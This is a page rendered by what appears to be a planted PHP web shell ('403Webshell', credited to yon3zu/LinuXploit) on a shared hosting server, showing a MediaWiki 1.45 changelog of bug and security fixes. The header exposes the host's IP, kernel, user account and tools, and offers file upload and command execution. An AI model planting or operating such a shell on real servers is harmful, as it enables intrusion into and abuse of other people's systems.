403Webshell
Server IP : 66.29.153.156  /  Your IP : 216.73.217.36
Web Server : LiteSpeed
System : Linux premium322.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
User : lastyfjz ( 1521)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /./././var/softaculous/mw14/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /./././var/softaculous/mw14/changelog.txt
== MediaWiki 1.45.4 ==

This is a security and maintenance release of the MediaWiki 1.45 branch.

=== Changes since 1.45.3 ===
* Localisation updates.
* (T419192) Actions: Fix incorrect variable shadowing.
* (T421659) Installer: Skip dropIndex() when table does not exists.
* (T413545, T422879) Update wikimedia/parsoid to 0.22.3.
* (T423185)  HashSiteStore: Don't trigger PHP 8.5 warnings if the Site has
  no globalID.
* (T420239) search: Escape highlighting terms in postgres.
* ParserOutput: Add JsonCodec hints for TOCData and WarningMsgs.
* (T414805) Media: Re-apply Use previous step for non-standard width between
  steps and original.
* (T418745, T423895)  Media: Fallback to the largest standard size if an
  overly large one is requested.
* (T382781) Changed Levantine Arabic numerals to Western numerals.
* (T382781) [PHP 8.4] Ensure Levantine Arabic numerals stay as Western
  numerals.
* (T261260) Limit preloading workaround for autoload bug to PHP<8.6.
* Upload: Avoid null array key in UploadBase::getMaxUploadSize.
* (T423821) Correctly support new file tables in RevDelFileItem.
* (T423502) AuthManager: Log status changes from
  SecuritySensitiveOperationStatusHook call.
* (T419768) RawAction: Restrict content type to javascript.
* HTMLForm: Add 'type' => 'button'.
* (T395204) Update GetSecurityLogContext @since tags for backports.
* (T424553) Correctly support new file tables in RevisionDeleteUser.
* (T402792, T414805, T416620, T418178) DjvuHandler: Make it follow thumb steps.
* (T425393)  languages: Add back Chinese language message entries for
  $specialPageAliases.
* (T425742) ApiQueryInfo: Pass an empty string instead of null to
  EditFormPreloadText hook.
* (T424114) Media: Improve $wgThumbnailSteps docs.
* resetUserEmail: Log email change to authentication log.
* resetUserEmail: Add reason option for email change.
* resetUserEmail: Log more events from script.
* changePassword/resetUserEmail: Invalidate user sessions upon password
  change.
* (T426861) composer.json: Updated symfony/yaml from 6.4.25 to 6.4.40.
* (T366986) Parser: Improve recursive lock error message.
* (T413545) Update wikimedia/parsoid to 0.22.4.
* Add GitHub to $wgGitRepositoryViewers.
* (T425818) changePassword: Log password change to authentication log.
* changePassword: Add reason option for password change.
* (T428406) LocalFileMoveBatch: Also update fr_archive_name when moving file.
* (T429826) Updated guzzlehttp/guzzle from 7.10.0 to 7.12.1.
* (T423617) Check the target url for redirects are allowed.
* (T429965) Updated guzzlehttp/guzzle from 7.12.1 to 7.12.3.
* (T383047) Mail: Extract sendWithMailFunction() from UserMailer::send().
* (T429720) FileRepo: Fix typos in schema compatibility checks.
* (T383047) Mail: Log PHP mail() send failures with recipient count.
* (T425406, CVE-2026-58036) SECURITY: Fix ApiQueryUsers leaking status of
  private user conditions for user.
* (T422306, CVE-2026-58028) SECURITY: Disallow user JS in pretty-print api.php
  responses.
* (T427235, CVE-2026-58033) SECURITY: Exclude rev-deleted usernames from
  distinct authors query.
* (T426867, CVE-2026-58032) SECURITY: mw.Api.getErrorMessage: Treat
  formatversion=1 as text.
* (T299359, CVE-2026-58026) SECURITY: Make sure the actual title that's being
  transcluded is includable.
* (T422085, CVE-2026-58024) SECURITY: Restrict interwiki user lookup in
  ApiUserrights.
* (T422676, CVE-2026-58029) SECURITY: Check for editmyprivateinfo right in more
  places.
* (T422995, CVE-2026-58037) SECURITY: LogFormatter: 'raw' parameter format is no
  longer raw HTML.
* (T422244, CVE-2026-58025) SECURITY: Safely unserialize log entry parameters.

== MediaWiki 1.45.3 ==

This is a maintenance release of the MediaWiki 1.45 branch.

=== Changes since 1.45.2 ===
* Fixed backport issues.

== MediaWiki 1.45.2 ==

This is a security and maintenance release of the MediaWiki 1.45 branch.

=== Changes since 1.45.1 ===
* Localisation updates.
* (T386108) Upgrade pear/pear-core-minimal to v1.10.17.
* (T412194) Upgrading justinrainbow/json-schema (5.3.0 => 5.3.1).
* (T411213) Upgrade wikimedia/less.php from 5.2.2 to 5.5.0.
* (T413538) MultiHttpClient: Remove curl_close() call.
* (T413565) Search: Replace deprecated SplObjectStorage methods.
* Mime: Change mime type video/x-matroska to video/matroska.
* (T413625) LinksMigration: Correctly filter for equal namespaces.
* (T413582) ShellboxClientFactory: Handle $service being null in getUrl().
* (T413672) EtcdConfigTest: Add return value for some MultiHttpClient mocks.
* (T413675) DBConnRefTest: Add a temporary variable for return value in
  testRoleExceptions.
* (T413580) LanguageCodeTest: Remove unnecessary null assertion.
* Allow wikimedia/testing-access-wrapper ^4.0.0.
* Logging: Handle possible null as type for LogPage.
* (T411019) Logging: Set default for log type on dropdown via LogEventsList.
* (T413690) libs: Fix closure detection in MemoizedCallable.
* (T413923) Don't use null offsets in BlockManager::getUniqueBlocks.
* SiteConfiguration: Optimize processSetting for default-only case.
* SiteConfiguration: Use \array_key_exists().
* SiteConfiguration: Use use function syntax.
* Config: Use use function array_key_exists some more.
* (T413924, T413925) tests: PHP 8.5 compatibility in AuthManager tests.
* (T413573) [php8.4] Use DOMCompat::innerHTML() instead of Element::nodeValue.
* Update documentation from which versions you can upgrade.
* (T413673) tests: Fix PHP8.5 error when casting float(INF) as integer.
* (T414355) Fix PHP 8.5 deprecation warnings in IcuCollation.
* (T414351) Avoid coercing NAN/INF/-INF to string.
* (T404636) tests: Hide deprecation warning for PHPSessionHandler.
* (T414323) tests: Use setAttributeForTest() correctly.
* (T413674) ParamValidator: Suppress cast warning in IntegerDef.
* (T413577) Parser: Ignore long user provided int in
  Sanitizer::decodeCharReferences.
* (T413576) Rdbms: Get strings from SQLPlatform::getDatabaseAndTableIdentifier.
* (T413579) Site: Handle non-stored Site objects in SiteList.
* (T413920) tests: Mock some functions in OutputPageTest.
* (T413926) Do not attempt to get handler for unknown file types.
* (T413919) tests: Use real TitleFormatter in LinkBatchTest.
* (T413930) User: Add fallback 'default' to User::getDatePreference.
* (T413934) JobQueueGroup: avoid PHP 8.5 deprecation from null array offsets.
* (T413922) Rdbms: Handle null from DatabaseDomain::getDatabase in
  LBFactoryMulti.
* (T413901) Media: Remove deprecated imagedestroy.
* rdbms::assertTransactionRoundStage: Show transaction name if available.
* (T414350) Language: Handle NAN coercion to string in formatting numbers.
* (T413931) tests: Set module name in ApiBaseTest::doGetParameterFromSettings.
* (T414336) Disable process timeout for Composer phpunit script.
* (T413575) libs>XhprofData: Handle use of NULLs as array keys for PHP8.5.
* (T406744) tests: remove setAccessible() call on Reflection objects.
* tests: Change DomDocument return type in SpecialCreateAccountTest.
* (T415443) Upgrading mck89/peast (v1.16.3 => v1.17.4).
* (T413918) tests: Mock value for RangeChronologicalPager::getTimestampField.
* (T413921) LinksUpdate: Handle nullable el_to_path column in
  ExternalLinksUpdate.
* (T413926) Upload: Do not attempt to get handler for unknown file types.
* File: Ensure mime type is set for LocalFile::getMimeType.
* (T413917) Specials: Use empty string as missing type on
  Special:RevisionDelete.
* (T415723) Updated phpunit/phpunit from 9.6.21 to 9.6.33.
* Update phpunit/phpunit from 9.6.33 to 9.6.34.
* Update wikimedia/parsoid to 0.22.1.
* (T414599) migrateLinksTable: Handle constant namespace values in mapping.
* VueComponentParser: use Parsoid DOM compatibility methods.
* FileRepo: Add 'userAgent' option in ForeignAPIRepo for wgForeignFileRepos.
* [tests] Add forward-compatibility alias for JsonDeserializableSubClass.
* (T367584) JsonCodec/ParserCache: Forward-compatibility test cases.
* (T413545) Update wikimedia/parsoid to 0.22.2.
* (T417390) mediawiki.util: Don't throw in addSubtitle if the skin lacks a
  subtitle.
* (T414884) PostgresInstaller: Handle null password in openConnectionToAnyDB.
* Forward compatibility with ParserOutput::getTitle().
* Upgrade wikimedia/css-sanitizer from 6.1.0 to 6.2.1.
* (T414805, T418745, T418346) WebPHandler: Allow the original being served on
  the web.
* (T411013) mediawiki.util: Add adjustThumbWidthForSteps for step sizing in JS.
* (T411013) mediawiki.util,FileRepo: Improve adjustThumbWidthForSteps test
  coverage.
* (T411125) Round to original file width if there is no steep between that &
  requested.
* (T411125) File: Allow scaling up vectorized images to larger sizes.
* (T360589, T415598) Move handling of ThumbnailSteps to media handlers.
* (T416518) Disable Composer audit.block-insecure option.
* (T419183) ParserOutputFlags: add HAS_SLOT_HEADERS.
* (T419479) sql: Mark pl_target_id as non-nullable in abstract schema.
* (T329183, T417691) Clarify documentation for action=query&list=tags.
* (T391524) EditPage: Handle MWException when serializing the preloaded
  content.
* (T417819) ParserOutputFlags: Back-port new flags added in 1.46 for
  forward compat.
* (T384147, CVE-2026-34092) SECURITY: Block UI elements in 'tools'-sidebar
  shows presence of an autoblocked IP.
* (T410429, CVE-2026-34088) SECURITY: RecentChanges entries expose suppressed
  content via generated log page html.
* (T411305, CVE-2026-34091) SECURITY: User localization leaked by AbuseFilter
  + EventStream.
* (T411366, CVE-2026-34090) SECURITY: Suggested investigations: Handle suppressed
  usernames.
* (T414547, CVE-2026-34093) SECURITY: Special:UserRights allows viewing user
  rights from private wiki.
* (T416090, CVE-2026-34094) SECURITY: Customized help link for page protection
  indicator is relative to subpage name, because the link target is missing the
  "/wiki/" prefix.
* (T419192, CVE-2026-34095) SECURITY: action=raw with Special:Mypage subpage title
  responds with "Content-Type) SECURITY: text/html" on ctype=text/javascript
  request.

== MediaWiki 1.45.1 ==

This is a security and maintenance release of the MediaWiki 1.45 branch.

=== Changes since 1.45.0 ===
* Localisation updates.
* (T411827) SpecialPageFactory: Handle resolveAlias() returning null in
  getPage() and exists().
* (T410514) Config: Fix "Using null as the key parameter for array_key_exists"
  PHP 8.5 warning.
* (T391882) HTMLFormFieldCloner: Update version number in deprecation message.
* (T411968) Installer: Do not use null as array offset.
* Add support for HTTP/3 in MultiHttpClient.
* (T411968) EditResultBuilder: Do not use null as array offset.
* Add http/3 to runMulti in MultiHttpClient
* (T406639, CVE-2025-67477) SECURITY: Escape word-separator message in
  Special:ApiSandbox.
* (T406664, CVE-2025-67475) SECURITY: Escape square brackets in autocomment
  links.
* (T405859, CVE-2025-67476) SECURITY: Do not use importers IP in case of
  external rev author.
* (T385403, CVE-2025-67478) SECURITY: Always escape commas in mail
  encoded-words.
* (T407131, CVE-2025-67479) SECURITY: Sanitizer: disallow underscore and wide
  underscore in data-* attribute names.
* (T401053, CVE-2025-67480) SECURITY: Check read permissions in
  ApiQueryRevisionsBase.
* (T409226, CVE-2025-67483) SECURITY: mediawiki.page.preview: Escape
  'comma-separator' between multiple protection levels.
* (T251032, CVE-2025-67481) SECURITY: Disallow 'style' attribute in client-side
  messages (jqueryMsg).

Youez - 2016 - github.com/yon3zu
LinuXploit